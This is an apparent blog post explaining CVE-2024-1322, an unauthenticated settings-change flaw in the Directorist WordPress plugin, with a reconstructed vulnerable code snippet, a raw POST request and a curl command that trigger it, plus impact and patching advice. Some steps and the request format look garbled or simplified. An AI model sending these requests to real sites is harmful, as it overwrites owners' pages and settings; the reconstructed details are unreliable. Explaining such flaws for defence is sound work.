In February 2024, a critical vulnerability, CVE-2024-1322, was discovered in the popular Directorist – WordPress Business Directory Plugin with Classified Ads Listings (up to version 7.8.4). This plugin is widely used to power business directories and classified ad listings on thousands of WordPress sites. Unfortunately, its setup_wizard function contains a dangerous flaw—a missing capability check—making it possible for unauthenticated (non-logged-in) users to modify crucial website settings.
In this post, we’ll break down what this vulnerability is, how attackers can exploit it, walk through a code example, and review mitigation steps. All details are written for easy understanding and exclusive to this post.
What happened?
Directorist’s setup_wizard function does not properly check whether a user is authorized to access or perform the action. This means *anyone*—even if they’re not logged in—can send specially crafted requests to the site and trigger this function.
Change the map provider (for example, swap Google Maps for another provider)
Impacted versions:
All versions up to and including 7.8.4
Let’s look at a snippet of the vulnerable code (simplified for clarity)
// In includes/classes/class-setup-wizard.php
public function setup_wizard() {
// NO capability or authentication checks here!
if ( isset($_POST['action']) && $_POST['action'] === 'directorist-setup-wizard' ) {
// Re-create default pages
$this->create_default_pages();
// Change monetization and map settings
update_option('directorist_monetization', $_POST['monetization']);
update_option('directorist_map_provider', $_POST['map_provider']);
// (Other setup routines...)
}
}
Normally, a function that changes critical settings should *always* check if the current user is logged in and has the right permissions (for example, is an admin). But here, anyone can trigger it via a simple HTTP POST request.
The Exploit, Step-by-Step
1. The attacker crafts a POST request to any WordPress site running the vulnerable version of Directorist.
2. The request targets the page hosting the setup wizard (often /wp-admin/admin-ajax.php or anywhere the function is loaded).
The attacker sends the following POST data
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victimsite.com
Content-Type: application/x-www-form-urlencoded
action=directorist-setup-wizard
monetization=enable # or 'disable'
map_provider=google # or 'openstreetmap'
Since no login or permission check exists, the plugin accepts and processes the request.
5. Default directory pages are re-created (possibly overwriting legitimate pages), and map/monetization settings are changed.
To reproduce this, an attacker would run something like
curl -X POST 'https://victimsite.com/wp-admin/admin-ajax.php'; \
-d 'action=directorist-setup-wizard' \
-d 'monetization=enable' \
-d 'map_provider=openstreetmap'
Page Loss: Recreating default pages may wipe out customizations, listings, or SEO work.
- Monetization Disruption: Enabling/disabling monetization can prevent site owners from making money or disrupt payment flows.
- Map Manipulation: Switching providers can break map display or expose the site to further attacks.
This is especially dangerous on high-traffic, directory-driven websites—think local business listings, service marketplaces, etc.
References & Further Reading
- Original plugin page
- Wordfence Advisory for CVE-2024-1322
- NVD CVE Listing
- Plugin changelog/fix (if available)
Update immediately:
As soon as a patched version is released, update Directorist via the WordPress admin dashboard or via official downloads.
Conclusion
CVE-2024-1322 is a serious oversight that allowed *anyone* on the internet to reconfigure key parts of WordPress directory sites using Directorist. This exploit shows the critical importance of always checking user permissions in any function that modifies data.
Stay safe and keep your plugins up to date!
*Exclusive analysis by ChatGPT. Feel free to share or quote with credit.*
Timeline
Published on: 02/29/2024 01:43:47 UTC
Last modified on: 02/29/2024 13:49:29 UTC